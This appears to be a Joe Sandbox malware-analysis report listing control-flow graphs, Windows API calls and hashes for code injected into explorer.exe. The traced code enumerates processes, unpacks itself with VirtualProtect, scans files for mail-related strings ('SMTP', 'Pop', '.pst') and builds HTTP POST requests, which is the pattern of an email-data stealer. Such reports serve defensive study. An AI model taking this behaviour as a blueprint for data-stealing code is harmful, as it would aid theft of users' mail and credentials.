VirtualProtect * 2 252->254 256 89ee2-89ef1 253->256 257 89ef3-89efe 253->257 258 89f34-89f38 254->258 256->252 257->256 258->258 260 89f3a 258->260 259->247 261 89ea8-89eaa 259->261 260->220 262 89eac-89eb2 261->262 263 89eb3-89ec0 261->263 262->263 265 89ec9-89ecc 263->265 266 89ec2-89ec7 263->266 266->259
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_88000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                                                                                                                    • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                                                                                                                                    • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                                                                                                                    • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 276 829b7-829c7 GetProcessHeap RtlAllocateHeap
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                    • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                                                                                                                    • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                                                                                                                                    • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                                                                                                                    • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 284 82999-829a3 call 827e2 287 829b5-829b6 284->287 288 829a5-829af GetProcessHeap HeapFree 284->288 288->287
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2580854192-0
                                                                                                                                                    • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                                                                                                                    • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                                                                                                                                    • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                                                                                                                    • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 289 81c39-81c5f call 829b7 RtlMoveMemory 292 81c65-81c6d 289->292 293 81e36-81e3c 289->293 294 81e2d-81e30 292->294 295 81c73-81c75 292->295 294->292 294->293 295->294 296 81c7b-81c80 295->296 296->294 297 81c86-81c8b 296->297 297->294 298 81c91-81c96 297->298 298->294 299 81c9c-81ca0 298->299 300 81cd2-81cd4 299->300 301 81ca2-81cae call 81ffb 299->301 300->294 302 81cda-81cf0 300->302 307 81cc9-81ccc 301->307 308 81cb0-81cb3 301->308 302->294 304 81cf6-81cfa 302->304 304->294 306 81d00-81d0b 304->306 310 81d0d 306->310 311 81d45-81d47 306->311 307->301 309 81cce 307->309 312 81cba-81cbd 308->312 313 81cb5-81cb8 308->313 309->300 315 81d11-81d1d call 81ffb 310->315 311->294 314 81d4d-81d56 311->314 312->307 316 81cbf-81cc2 312->316 313->307 313->312 317 81d58-81d5e 314->317 318 81d74 314->318 326 81d38-81d3b 315->326 327 81d1f-81d22 315->327 316->307 320 81cc4-81cc7 316->320 321 81d6e-81d72 317->321 322 81d60-81d67 call 81ffb 317->322 318->294 324 81d7a-81d81 318->324 320->307 320->309 321->318 322->321 334 81d69-81d6c 322->334 324->294 328 81d87-81d8a 324->328 326->315 329 81d3d-81d41 326->329 331 81d29-81d2c 327->331 332 81d24-81d27 327->332 328->294 333 81d90-81d99 328->333 329->311 331->326 335 81d2e-81d31 331->335 332->326 332->331 336 81e29 333->336 337 81d9f-81da2 333->337 334->317 334->321 335->326 338 81d33-81d36 335->338 336->294 337->336 339 81da8-81de9 call 829b7 RtlMoveMemory RtlZeroMemory StrStrIA 337->339 338->326 338->329 342 81deb-81df5 StrStrIA 339->342 343 81e22-81e24 call 82999 339->343 342->343 344 81df7-81e01 StrStrIA 342->344 343->336 344->343 346 81e03-81e0d StrStrIA 344->346 346->343 347 81e0f-81e19 StrStrIA 346->347 347->343 348 81e1b-81e1d call 81e44 347->348 348->343
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Memory$HeapMove$AllocateProcessZero
                                                                                                                                                    • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                                                                                                                                    • API String ID: 1061763166-3069160855
                                                                                                                                                    • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                                                                                                                    • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                                                                                                                                    • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                                                                                                                    • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 350 81972-819a6 call 829b7 RtlMoveMemory 353 81c2c-81c31 350->353 354 819ac-819b6 350->354 355 819b7-819bb 354->355 356 819c1-819c3 355->356 357 81c17-81c25 355->357 356->357 358 819c9-819ce 356->358 357->355 359 81c2b 357->359 358->357 360 819d4-819db 358->360 359->353 360->357 361 819e1-819e4 360->361 361->357 362 819ea-819fc 361->362 363 819fe-81a05 362->363 364 81a4f-81a51 362->364 367 81a06-81a11 call 81ffb 363->367 365 81c10-81c12 364->365 366 81a57-81a68 364->366 369 81c13 365->369 366->365 368 81a6e-81a72 366->368 375 81a13-81a1e 367->375 376 81a37-81a3a 367->376 368->365 371 81a78-81a7c 368->371 369->357 373 81a7e-81a84 371->373 374 81ad1-81ad3 371->374 379 81a85-81a90 call 81ffb 373->379 374->365 378 81ad9-81adf 374->378 380 81a20-81a23 375->380 381 81a25-81a28 375->381 376->367 377 81a3c-81a4e 376->377 377->364 382 81b00-81b03 378->382 392 81abc-81abf 379->392 393 81a92-81a9d 379->393 380->376 380->381 381->376 384 81a2a-81a30 381->384 386 81ae1-81ae9 382->386 387 81b05-81b07 382->387 384->376 385 81a32-81a35 384->385 385->376 385->377 386->387 389 81aeb-81afa call 81ffb 386->389 390 81c0c 387->390 391 81b0d-81b14 387->391 389->382 389->390 390->365 391->390 396 81b1a-81b1d 391->396 392->379 394 81ac1-81acd 392->394 397 81a9f-81aa5 393->397 398 81aa7-81aad 393->398 394->374 396->390 400 81b23-81b2a 396->400 397->392 397->398 398->392 401 81aaf-81ab5 398->401 400->390 402 81b30-81b33 400->402 401->392 403 81ab7-81aba 401->403 402->390 404 81b39-81b73 call 829b7 RtlMoveMemory RtlZeroMemory 402->404 403->392 403->394 407 81b79-81b83 404->407 408 81c02-81c0a 404->408 407->408 409 81b85-81b8b 407->409 408->369 409->408 410 81b8d-81b9d StrStrIW 409->410 411 81bfb-81bfd call 82999 410->411 412 81b9f-81ba9 StrStrIW 410->412 411->408 412->411 414 81bab-81bb5 StrStrIW 412->414 414->411 415 81bb7-81bc1 StrStrIW 414->415 415->411 416 81bc3-81bcd StrStrIW 415->416 416->411 417 81bcf-81bd8 lstrlenW 416->417 417->411 418 81bda-81bf6 call 829b7 call 82917 call 81e44 call 82999 417->418 418->411
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                                                                                                                                    • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                                                                                                                                    • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                                                                                                                                    • API String ID: 76385412-3831209991
                                                                                                                                                    • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                                                                                                                    • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                                                                                                                                    • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                                                                                                                    • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 426 820a7-82102 call 82415 call 829b7 call 82938 call 824cc 435 8211d-82129 426->435 436 82104-8211b 426->436 439 8212d-8212f 435->439 436->439 440 82403-82412 call 82999 439->440 441 82135-8216c RtlZeroMemory 439->441 445 823fb-82402 441->445 446 82172-8218d 441->446 445->440 447 821bf-821d1 446->447 448 8218f-821a0 call 8243d 446->448 453 821d5-821d7 447->453 454 821a2-821b1 448->454 455 821b3 448->455 456 823e8-823ee 453->456 457 821dd-82239 call 82866 453->457 458 821b5-821bd 454->458 455->458 461 823f0-823f2 call 82999 456->461 462 823f7 456->462 466 8223f-82244 457->466 467 823e1 457->467 458->453 461->462 462->445 468 8225e-8228c call 829b7 wsprintfW 466->468 469 82246-82257 466->469 467->456 472 8228e-82290 468->472 473 822a5-822bc 468->473 469->468 474 82291-82294 472->474 479 822fb-82315 473->479 480 822be-822f4 call 829b7 wsprintfW 473->480 475 8229f-822a1 474->475 476 82296-8229b 474->476 475->473 476->474 478 8229d 476->478 478->473 484 8231b-8232e 479->484 485 823be-823d4 call 82999 479->485 480->479 484->485 488 82334-8234a call 829b7 484->488 493 823dd 485->493 494 823d6-823d8 call 82999 485->494 495 8234c-82357 488->495 493->467 494->493 497 82359-82366 call 8297c 495->497 498 8236b-82382 495->498 497->498 502 82384 498->502 503 82386-82393 498->503 502->503 503->495 504 82395-82399 503->504 505 8239b 504->505 506 823b3-823ba call 82999 504->506 508 8239b call 8296b 505->508 506->485 510 823a0-823ad RtlMoveMemory 508->510 510->506
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                      • Part of subcall function 00082938: lstrlen.KERNEL32(0030AE26,?,00000000,00000000,000820E3,75712B62,0030AE26,00000000), ref: 00082940
                                                                                                                                                      • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0030AE26,00000001,00000000,00000000), ref: 00082952
                                                                                                                                                      • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                                                                                                                                    • wsprintfW.USER32 ref: 00082278
                                                                                                                                                    • wsprintfW.USER32 ref: 000822E3
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                    • API String ID: 4204651544-1701262698
                                                                                                                                                    • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                                                                                                                    • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                                                                                                                                    • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                                                                                                                    • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 511 81ece-81eec StrStrIA 512 81eee-81ef0 511->512 513 81ef5-81f35 RtlMoveMemory * 2 StrStrIA 511->513 514 81fab-81fb3 512->514 515 81fa7 513->515 516 81f37-81f48 StrStrIA 513->516 517 81fa9-81faa 515->517 516->515 518 81f4a-81f5b StrStrIA 516->518 517->514 518->515 519 81f5d-81f68 lstrlen 518->519 520 81f6a 519->520 521 81fa3-81fa5 519->521 522 81f6c-81f78 call 81ffb 520->522 521->517 525 81f7a-81f80 522->525 526 81f9b-81fa1 lstrlen 522->526 527 81f82-81f85 525->527 528 81f87-81f8a 525->528 526->521 526->522 527->526 527->528 528->526 529 81f8c-81f8f 528->529 529->526 530 81f91-81f94 529->530 530->526 531 81f96-81f99 530->531 531->515 531->526
                                                                                                                                                    APIs
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                                                                                                                                    • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                                                                                                                                    • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00081F64
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryMovelstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 456560858-0
                                                                                                                                                    • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                                                                                                                    • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                                                                                                                                    • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                                                                                                                    • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                                                                                                                                    • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                                                                                                                                    • lstrcmpi.KERNEL32(00000000,0030C16C,?,?,00081E22), ref: 00081E81
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                                                                                                                                    • RtlMoveMemory.NTDLL(0030C16C,00000000,00000000), ref: 000826A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2826435453-0
                                                                                                                                                    • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                                                                                                                    • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                                                                                                                                    • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                                                                                                                    • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00081966
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                                                                                                                                      • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                                                                                                                      • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3402831612-0
                                                                                                                                                    • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                                                                                                                    • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                                                                                                                                    • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                                                                                                                    • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:7.7%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:21.1%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:38
                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                    execution_graph 1514 6d637 1515 6d62e 1514->1515 1517 6d6f8 1515->1517 1518 6d748 1515->1518 1520 6d74d 1518->1520 1519 6d835 LoadLibraryA 1519->1520 1520->1519 1522 6d884 VirtualProtect VirtualProtect 1520->1522 1524 6d879 1520->1524 1523 6d912 1522->1523 1523->1523 1524->1517 1485 64914 1499 61d08 CreateToolhelp32Snapshot 1485->1499 1488 61d08 4 API calls 1489 64941 1488->1489 1490 61d08 4 API calls 1489->1490 1491 6494d SleepEx 1490->1491 1505 61838 1491->1505 1493 64962 SHGetSpecialFolderPathW 1495 6497b 1493->1495 1496 649e0 1493->1496 1494 64a18 1495->1496 1498 61eb4 FindFirstFileW FindFirstFileW 1495->1498 1496->1494 1497 61eb4 FindFirstFileW FindFirstFileW 1496->1497 1497->1494 1498->1495 1500 61d2c Process32First 1499->1500 1501 61d7a 1499->1501 1503 61d44 1500->1503 1501->1488 1502 61d71 CloseHandle 1502->1501 1503->1502 1504 61d5f Process32Next 1503->1504 1504->1503 1506 61847 1505->1506 1525 6d5da 1526 6d614 1525->1526 1527 6d748 3 API calls 1526->1527 1528 6d6f8 1526->1528 1527->1528 1507 6d748 1509 6d74d 1507->1509 1508 6d835 LoadLibraryA 1508->1509 1509->1508 1511 6d884 VirtualProtect VirtualProtect 1509->1511 1513 6d879 1509->1513 1512 6d912 1511->1512 1512->1512

                                                                                                                                                    Callgraph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                    • Disassembly available
                                                                                                                                                    callgraph 0 Function_00061A04 1 Function_00065104 1->0 4 Function_00062C00 1->4 25 Function_00063F20 1->25 29 Function_00061C28 1->29 33 Function_00061838 1->33 34 Function_00061938 1->34 57 Function_00061B74 1->57 63 Function_00061C80 1->63 83 Function_00061CA0 1->83 99 Function_00061BC8 1->99 110 Function_00061BE8 1->110 2 Function_00061405 3 Function_00065300 3->1 3->3 3->33 66 Function_00064C80 3->66 3->110 13 Function_00062B14 4->13 98 Function_000629C0 4->98 4->110 5 Function_00061000 6 Function_0006370C 6->0 7 Function_0006CC0D 8 Function_0006D70A 9 Function_00061D08 104 Function_00061CD0 9->104 10 Function_00061508 11 Function_0006D416 12 Function_00064914 12->9 12->33 50 Function_00061860 12->50 88 Function_00061EB4 12->88 14 Function_00062214 14->33 15 Function_00064C14 16 Function_00064710 16->0 74 Function_00064094 16->74 97 Function_00063FC0 16->97 103 Function_000618D0 16->103 16->110 111 Function_000618E8 16->111 113 Function_00063CF0 16->113 116 Function_00063FF8 16->116 17 Function_00062F10 17->33 18 Function_00064B1E 19 Function_0006311C 20 Function_0006211C 21 Function_0006141D 22 Function_00063818 22->0 22->6 22->33 22->50 78 Function_00063690 22->78 22->103 107 Function_000621E4 22->107 22->111 23 Function_00063424 24 Function_00061822 39 Function_00063E4C 25->39 26 Function_00064B2E 27 Function_00064C2E 28 Function_0006D42D 30 Function_0006D637 40 Function_0006D748 30->40 31 Function_0006343C 32 Function_00063C3C 41 Function_00063B48 32->41 46 Function_0006345C 32->46 32->111 35 Function_00062838 36 Function_00064C42 37 Function_00064540 64 Function_00064280 37->64 37->97 37->110 38 Function_0006624F 39->33 39->50 40->8 41->17 59 Function_0006317C 41->59 42 Function_00063048 42->33 43 Function_00061254 44 Function_00062754 45 Function_00064B5E 46->33 71 Function_0006188C 46->71 46->110 47 Function_00064C5C 48 Function_00062964 79 Function_0006299C 48->79 49 Function_0006CD63 50->110 51 Function_00061560 52 Function_00063F60 52->14 52->50 68 Function_0006268C 52->68 52->111 53 Function_00064B6F 54 Function_0006156C 55 Function_00062368 55->33 55->34 55->50 55->71 81 Function_00062298 55->81 55->103 115 Function_000618F8 55->115 56 Function_00061576 58 Function_0006D57E 59->19 59->42 59->50 75 Function_00063094 59->75 59->103 60 Function_0006277C 60->44 60->48 60->103 61 Function_00064A7C 62 Function_00062F84 64->0 64->33 64->50 65 Function_00064680 65->64 65->97 65->110 66->20 66->33 66->50 66->60 70 Function_00061A8C 66->70 80 Function_00063D9C 66->80 102 Function_000628D4 66->102 66->110 67 Function_0006628F 68->33 68->50 68->55 69 Function_00061D8C 71->33 72 Function_00063B8C 72->0 72->41 72->46 72->111 73 Function_00062F88 74->0 74->33 74->50 74->116 75->33 75->50 75->73 76 Function_0006CD92 77 Function_00063A90 77->14 77->50 77->68 77->111 78->0 82 Function_000644A4 82->74 82->97 82->113 84 Function_00064BA0 85 Function_00063CAC 85->46 86 Function_00064AA9 87 Function_0006CFB7 88->33 88->50 88->69 90 Function_00061DB0 88->90 89 Function_000614B2 90->33 90->50 90->69 90->88 91 Function_00061FB0 92 Function_00064BB0 93 Function_0006D0BB 94 Function_00064BB8 95 Function_0006D4C4 96 Function_0006D0C3 100 Function_000614D4 101 Function_00061FD4 101->33 101->50 101->91 101->101 102->35 102->44 102->110 105 Function_000672D0 106 Function_0006D5DA 106->40 108 Function_0006CCE2 109 Function_000645E0 109->64 109->97 109->110 112 Function_00063AF0 112->22 114 Function_000635FC 112->114 113->23 113->31 113->32 113->72 113->85 113->110 113->112 114->50 114->110 116->0 117 Function_000614F9

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 91 61db0-61e10 call 61838 FindFirstFileW 95 61e12-61e17 91->95 96 61e8e-61eb2 call 61860 91->96 98 61e73-61e83 95->98 99 61e19-61e25 call 61d8c 95->99 98->95 104 61e85-61e86 98->104 99->98 105 61e27-61e60 call 61838 call 61eb4 99->105 104->96 111 61e62-61e63 105->111 112 61e6b-61e6e call 61860 105->112 111->112 112->98
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE ref: 00061E03
                                                                                                                                                      • Part of subcall function 00061EB4: FindFirstFileW.KERNELBASE ref: 00061F05
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000002A.00000002.624648363.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_42_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                    • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
